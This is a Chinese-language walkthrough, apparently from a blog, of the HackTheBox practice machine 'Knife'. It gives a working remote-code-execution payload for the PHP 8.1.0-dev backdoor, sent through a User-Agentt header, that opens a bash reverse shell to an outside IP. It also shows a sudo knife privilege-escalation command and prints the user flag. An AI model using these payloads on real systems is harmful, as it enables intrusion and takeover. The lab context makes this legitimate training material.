使用nmap进行扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
|
sudo nmap --min-rate 10000 -sS -Pn -sV 10.129.211.145
Nmap scan report for 10.129.211.145
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds
|
开启了22端口和80端口,访问80端口
在其返回包看到PHP版本信息
1
2
3
4
5
6
7
8
|
HTTP/1.1 200 OK
Date: Sat, 13 Apr 2024 10:07:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8
|
此版本是存在后门,可以直接进行RCE
直接反弹一个shell到本地
User-Agentt:zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.4/8888 0>&1'");
获得user.txt的flag
1
2
3
|
james@knife:~$ cat user.txt
cat user.txt
8f76f62dae4f23ad7c61094fff67a86d
|
继续进行提权
sudo -l进行查看james用户的权限
1
2
3
4
5
6
|
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
|
可以无需密码以root权限执行/usr/bin/knife命令
利用python获取一个交互式shell
python3 -c "__import__('pty').spawn('/bin/bash')"
利用knife进行提权
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
N1Rvana included in HackTheBox